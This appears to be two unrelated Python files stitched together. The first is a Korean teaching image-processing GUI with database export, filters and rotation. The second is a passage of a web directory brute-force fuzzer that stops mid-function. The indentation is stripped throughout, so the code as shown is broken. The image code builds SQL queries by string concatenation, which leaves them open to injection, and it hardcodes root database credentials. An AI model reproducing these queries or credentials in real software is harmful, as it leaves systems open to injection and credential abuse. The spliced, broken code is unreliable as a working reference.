con = sqlite3.connect('imageDB') # open (or create) the database
cur = con.cursor() # create a cursor (the channel through which queries are executed)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = []
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## inner function: a function defined inside a function (local scope) #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # allocate input memory (initialized to 0)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.59.129', user='root',
password='1234', db='imageDB', charset='utf8') # open (or connect to) the database
cur = con.cursor() # create a cursor (the channel through which queries are executed)
# build a list of column names
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # close the database connection
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.59.129', user='root',
password='1234', db='imageDB', charset='utf8') # open (or connect to) the database
cur = con.cursor() # create a cursor (the channel through which queries are executed)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # entries look like ['puppy:128', 'puppy:512', ...]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## inner function: a function defined inside a function (local scope) #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # allocate input memory (initialized to 0)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
ws.set_column(0, outW, 1.0) # roughly 0.34
for r in range(outH):
ws.set_row(r, 9.5) # roughly 0.35
for rowNum in range(outW) :
for colNum in range(outH) :
data = outImage[rowNum][colNum]
# use the data value to set the cell background color, #000000 ~ #FFFFFF
if data > 15 :
hexStr = '#' + (hex(data)[2:])*3
else :
hexStr = '#' + ('0' + hex(data)[2:]) * 3
# prepare the cell format
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
def a_histoStretch() : # histogram stretching algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
# histogram stretching
# OUT = (IN - min) * HIGH / (max - min)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
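# Worked example (added): with minVal=50 and maxVal=200, a pixel of 125 maps to
# int((125 - 50) * 255 / (200 - 50)) = 127, so the original range [50, 200] is
# stretched to cover the full [0, 255] scale.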
def a_endInSearch() : # end-in search algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
limit = askinteger('엔드인', '상하 범위:', minvalue=1, maxvalue=127)
maxVal -= limit
minVal += limit
# histogram stretching (after clipping the range by `limit` at both ends)
# OUT = (IN - min) * HIGH / (max - min)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_histoEqual() : # histogram equalization algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
histo = [0] * 255; sumHisto = [0] * 255; normalHisto=[0] * 255
HIGH = 255
# build the histogram
for i in range(inH) :
for k in range(inW) :
value = inImage[i][k]
histo[value] += 1
# build the cumulative histogram
sVal = 0
for i in range(len(histo)) :
sVal += histo[i]
sumHisto[i] = sVal
# normalized cumulative histogram: (cumulative sum / (rows * cols)) * HIGH
for i in range(len(sumHisto)) :
normalHisto[i] = int(sumHisto[i] / (outW * outH) * HIGH)
# write the output using the normalized values
for i in range(inH) :
for k in range(inW) :
index = inImage[i][k]
outImage[i][k] = normalHisto[index]
display()
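# Worked example (added): for a 256x256 image (65,536 pixels), a gray level whose
# cumulative count is 32,768 is remapped to int(32768 / 65536 * 255) = 127, i.e.
# half of the pixels end up at or below mid-gray after equalization.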
def embossing() : # area processing - embossing algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
MSIZE=3
mask = [ [-1, 0, 0], [0, 0, 0], [0, 0, 1] ]
# temporary input image = 2 rows/columns larger than inImage
tmpInImage = []
for i in range(inH + 2):
tmpList = []
for k in range(inW + 2):
tmpList.append(128)
tmpInImage.append(tmpList)
tmpOutImage = []
for i in range(outH):
tmpList = []
for k in range(outW):
tmpList.append(0)
tmpOutImage.append(tmpList)
# original input --> temporary input
for i in range(inH):
for k in range(inW):
tmpInImage[i+1][k+1] = inImage[i][k]
# convolution: slide the mask over the image and accumulate
for i in range(1, inH):
for k in range(1, inW):
# process one pixel at a time with the 3x3 mask: multiply each pair and sum
S = 0.0
for m in range(0,MSIZE) :
for n in range(0,MSIZE) :
S += mask[m][n]*tmpInImage[i+(m-1)][k+(n-1)]
tmpOutImage[i-1][k-1] = S
# add 127 (because the mask coefficients sum to 0)
for i in range(outW):
for k in range(outH):
tmpOutImage[i][k] += 127
# temporary output --> final output
for i in range(outW) :
for k in range(outH) :
value = int(tmpOutImage[i][k])
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage[i][k] = value
display()
def morphing() : # morphing (blending) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
# select the second image file
filename2 = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
if filename2 == '' or filename2 == None :
return
inImage2 =[]
fsize2 = os.path.getsize(filename2)
inH2 = inW2 = int(math.sqrt(fsize2))
if inH2 != inH :
return
fp2 = open(filename2, 'rb')
for i in range(inH2): # allocate memory for the second input image (initialized to 0)
tmpList = []
for k in range(inW2):
data = int (ord(fp2.read(1)))
tmpList.append(data)
inImage2.append(tmpList)
fp2.close()
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
value = askinteger('합성비율', '두번째 영상의 가중치%-->', minvalue=1, maxvalue=99)
w1 = 1- (value/100); w2 = 1-w1
for i in range(inH) :
for k in range(inW) :
data = int(inImage[i][k]*w1 + inImage2[i][k]*w2)
if data > 255 :
data = 255
elif data < 0 :
data = 0
outImage[i][k] = data
display()
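# Note (added): with value=30 the weights become w1 = 0.7 and w2 = 0.3, so the
# blended output keeps 70% of the current image and mixes in 30% of the newly
# selected second image.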
def blurr() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
mSize = 3
mask = [[1/9, 1/9, 1/9], [1/9, 1/9, 1/9], [1/9, 1/9, 1/9]]
#####################
# temporary input image (padded by 2)
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# temporary output image
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# input ==> temporary input
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# convolution
for i in range(1, inW):
for k in range(1, inH):
# apply the 3x3 mask to one pixel --> multiply each pair and sum
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# post-process the result (<0, >255; if the mask sums to 0 the image gets dark)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# temporary output --> output
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def sharp() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
mSize = 3
# mask = [[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]] # mask 1
mask = [[0, -1, 0], [-1, 5, -1], [0, -1, 0]] # mask 2
#####################
# temporary input image (padded by 2)
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def edge1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
mSize = 3
mask = [[-1/9, -1/9, -1/9], [-1/9, 8/9, -1/9], [-1/9, -1/9, -1/9]]
#####################
# temporary input image (padded by 2)
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def edge2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
mSize = 3
mask = [[0, 0, 0], [-1, 1, 0], [0, 0, 0]]
#####################
# temporary input image (padded by 2)
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def edge3() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
    # Implement the actual image-processing algorithm
############################
mSize = 3
mask = [[0, -1, 0], [0, 1, 0], [0, 0, 0]]
#####################
    # Temporary input image (+2 for padding)
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
    # Temporary output image
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
    # Input ==> temporary input
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
    # Convolution operation.
for i in range(1, inW):
for k in range(1, inH):
            # Apply the 3x3 mask at one point --> multiply everything and add it up.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
    # Post-process the result (clamp to 0 and 255; if the mask sums to 0 the image comes out dark)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
    # Temporary output --> output
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def rotate1(): # image rotation (forward mapping)
global inImage, outImage, inH, inW, outH, outW, window, canvas, paper, filename
degree = askinteger('각도', '값 입력', minvalue=0, maxvalue=360)
    # Decide the size of the output image.
outW = inW;
outH = inH
    # Allocate output image memory
outImage = []
for i in range(0, inW):
tmpList = []
for k in range(0, inH):
tmpList.append(0)
outImage.append(tmpList)
    ### Actual image-processing algorithm ###
radian = degree * 3.141592 / 180.0
for i in range(0, inW):
for k in range(0, inH):
xs = i;
ys = k
xd = int(math.cos(radian) * xs - math.sin(radian) * ys)
yd = int(math.sin(radian) * xs + math.cos(radian) * ys)
if 0 <= xd < outW and 0 <= yd < outH:
outImage[xd][yd] = inImage[xs][ys]
###############################
display()
def rotate2(): # image rotation (backward mapping, about the center)
global inImage, outImage, inH, inW, outH, outW, window, canvas, paper, filename
degree = askinteger('각도', '값 입력', minvalue=0, maxvalue=360)
    # Decide the size of the output image.
outW = inW;
outH = inH
    # Allocate output image memory
outImage = []
for i in range(0, inW):
tmpList = []
for k in range(0, inH):
tmpList.append(0)
outImage.append(tmpList)
    ### Actual image-processing algorithm ###
radian = degree * 3.141592 / 180.0
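    # Backward mapping: for every destination pixel (xs, ys), rotate it about the
    # center (cx, cy) to find the source pixel (xd, yd) and copy from there.
    # Unlike the forward mapping in rotate1(), this leaves no holes in the output.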
cx = int(inW / 2);
cy = int(inH / 2)
for i in range(0, outW):
for k in range(0, outH):
xs = i;
ys = k
xd = int(math.cos(radian) * (xs - cx)
- math.sin(radian) * (ys - cy)) + cx
yd = int(math.sin(radian) * (xs - cx)
+ math.cos(radian) * (ys - cy)) + cy
if 0 <= xd < outW and 0 <= yd < outH:
outImage[xs][ys] = inImage[xd][yd]
else:
outImage[xs][ys] = 255
###############################
display()
def rotate3(): # image rotation (enlarged output canvas)
global inImage, outImage, inH, inW, outH, outW, window, canvas, paper, filename
degree = askinteger('각도', '값 입력', minvalue=0, maxvalue=360)
    # Decide the size of the output image.
radian90 = (90 - degree) * 3.141592 / 180.0
radian = degree * 3.141592 / 180.0
outW = int(inH * math.cos(radian90) + inW * math.cos(radian))
outH = int(inH * math.cos(radian) + inW * math.cos(radian90))
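    # The enlarged canvas is the bounding box of the rotated image:
    #   outW = inH*cos(90-deg) + inW*cos(deg) = inH*sin(deg) + inW*cos(deg)
    #   outH = inH*cos(deg)    + inW*cos(90-deg) = inH*cos(deg) + inW*sin(deg)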
# outW = inW; outH = inH
    # Allocate output image memory
outImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
outImage.append(tmpList)
    ### Actual image-processing algorithm ###
    # Make inImage2 the same size as outImage
inImage2 = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(255)
inImage2.append(tmpList)
    # Copy inImage into the center of inImage2
gap = int((outW - inW) / 2)
for i in range(0, inW):
for k in range(0, inH):
inImage2[i + gap][k + gap] = inImage[i][k]
    ### Actual image-processing algorithm ###
cx = int(outW / 2);
cy = int(outH / 2)
for i in range(0, outW):
for k in range(0, outH):
xs = i;
ys = k
xd = int(math.cos(radian) * (xs - cx)
- math.sin(radian) * (ys - cy)) + cx
yd = int(math.sin(radian) * (xs - cx)
+ math.cos(radian) * (ys - cy)) + cy
# if 0 <= xd < outW and 0 <= yd < outH :
if 0 <= xd < outW and 0 <= yd < outH:
outImage[xs][ys] = inImage2[xd][yd]
else:
outImage[xs][ys] = 255
###############################
display()
## Global variables
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None
## Main code
window = Tk(); window.geometry('200x100');
window.title('영상 처리&데이터 분석 Ver 1.0 (RC1)')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_separator()
pixelMenu.add_command(label='밝게하기', command=lambda: addImage(1)) # addition
pixelMenu.add_command(label='어둡게하기', command=lambda: addImage(2)) # subtraction
pixelMenu.add_command(label='밝게하기(뚜렷하게)', command=lambda: addImage(3)) # multiplication
pixelMenu.add_command(label='어둡게하기(희미하게)', command=lambda: addImage(4)) # division
pixelMenu.add_separator()
pixelMenu.add_command(label='영상합성', command=morphing)
areaMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소영역처리', menu=areaMenu)
areaMenu.add_command(label='엠보싱', command=embossing)
areaMenu.add_command(label='블러링', command=blurr)
areaMenu.add_command(label='샤프닝', command=sharp)
areaMenu.add_command(label='경계선추출(고주파)', command=edge1)
areaMenu.add_command(label='경계선추출(수직에지)', command=edge2)
areaMenu.add_command(label='경계선추출(수평에지)', command=edge3)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='좌우반전', command=LRReversalImage)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
geoMenu.add_command(label='화면확대-전방향', command=zoomInForW)
# geoMenu.add_command(label='화면확대-역방향(이웃 화소 보간법)', command=zoomInBackW) ## result comes out wrong {work in progress}
geoMenu.add_separator()
geoMenu.add_command(label='영상회전(포워딩)', command=rotate1)
geoMenu.add_command(label='영상회전(백워딩 및 중앙)', command=rotate2)
geoMenu.add_command(label='영상회전(확대)', command=rotate3)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=lambda: analyzeData(1))
analyzeMenu.add_command(label='입출력 시 최대값, 최소값', command=lambda: analyzeData(2))
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램 스트래칭', command=a_histoStretch)
analyzeMenu.add_command(label='엔드-인 탐색', command=a_endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=a_histoEqual)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
# Work to do
# Day11-04 self-study assignment: read the data back in from an Excel file
window.mainloop()
|
fuzzer.py
|
# -*- coding: utf-8 -*-
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# Author: Mauro Soria
import threading
import time
from lib.connection.request_exception import RequestException
from .path import Path
from .scanner import Scanner
class Fuzzer(object):
def __init__(
self,
requester,
dictionary,
suffixes=None,
prefixes=None,
exclude_response=None,
threads=1,
delay=0,
maxrate=0,
match_callbacks=[],
not_found_callbacks=[],
error_callbacks=[],
):
self.requester = requester
self.dictionary = dictionary
self.suffixes = suffixes if suffixes else []
self.prefixes = prefixes if prefixes else []
self.exclude_response = exclude_response
self.base_path = self.requester.base_path
self.threads = []
self.threads_count = (
threads if len(self.dictionary) >= threads else len(self.dictionary)
)
self.delay = delay
self.maxrate = maxrate
self.running = False
self.calibration = None
self.default_scanner = None
self.match_callbacks = match_callbacks
self.not_found_callbacks = not_found_callbacks
self.error_callbacks = error_callbacks
self.matches = []
self.scanners = {
"prefixes": {},
"suffixes": {},
}
def wait(self, timeout=None):
for thread in self.threads:
thread.join(timeout)
if timeout and thread.is_alive():
return False
return True
def rate_adjuster(self):
while not self.wait(0.15):
self.stand_rate = self.rate
def setup_scanners(self):
if len(self.scanners):
self.scanners = {
"prefixes": {},
"suffixes": {},
}
# Default scanners (wildcard testers)
self.default_scanner = Scanner(self.requester)
self.prefixes.append(".")
self.suffixes.append("/")
for prefix in self.prefixes:
self.scanners["prefixes"][prefix] = Scanner(
self.requester, prefix=prefix, tested=self.scanners
)
for suffix in self.suffixes:
self.scanners["suffixes"][suffix] = Scanner(
self.requester, suffix=suffix, tested=self.scanners
)
for extension in self.dictionary.extensions:
if "." + extension not in self.scanners["suffixes"]:
self.scanners["suffixes"]["." + extension] = Scanner(
self.requester, suffix="." + extension, tested=self.scanners
)
if self.exclude_response:
if self.exclude_response.startswith("/"):
self.exclude_response = self.exclude_response[1:]
self.calibration = Scanner(
self.requester, calibration=self.exclude_response, tested=self.scanners
)
def setup_threads(self):
if len(self.threads):
self.threads = []
for thread in range(self.threads_count):
new_thread = threading.Thread(target=self.thread_proc)
new_thread.daemon = True
self.threads.append(new_thread)
def get_scanner_for(self, path):
        # Clean the path, so we can check for extensions/suffixes
path = path.split("?")[0].split("#")[0]
if self.exclude_response:
yield self.calibration
for prefix in self.prefixes:
if path.startswith(prefix):
yield self.scanners["prefixes"][prefix]
for suffix in self.suffixes:
if path.endswith(suffix):
yield self.scanners["suffixes"][suffix]
for extension in self.dictionary.extensions:
if path.endswith("." + extension):
yield self.scanners["suffixes"]["." + extension]
yield self.default_scanner
def start(self):
self.setup_scanners()
self.setup_threads()
self.index = 0
self.rate = 0
self.stand_rate = 0
self.dictionary.reset()
self.running_threads_count = len(self.threads)
self.running = True
self.paused = False
self.play_event = threading.Event()
self.paused_semaphore = threading.Semaphore(0)
self.play_event.clear()
for thread in self.threads:
thread.start()
threading.Thread(target=self.rate_adjuster, daemon=True).start()
self.play()
def play(self):
self.play_event.set()
def pause(self):
self.paused = True
self.play_event.clear()
for thread in self.threads:
if thread.is_alive():
self.paused_semaphore.acquire()
def resume(self):
self.paused = False
self.paused_semaphore.release()
self.play()
def stop(self):
self.running = False
self.play()
def scan(self, path):
response = self.requester.request(path)
result = response.status
for tester in list(set(self.get_scanner_for(path))):
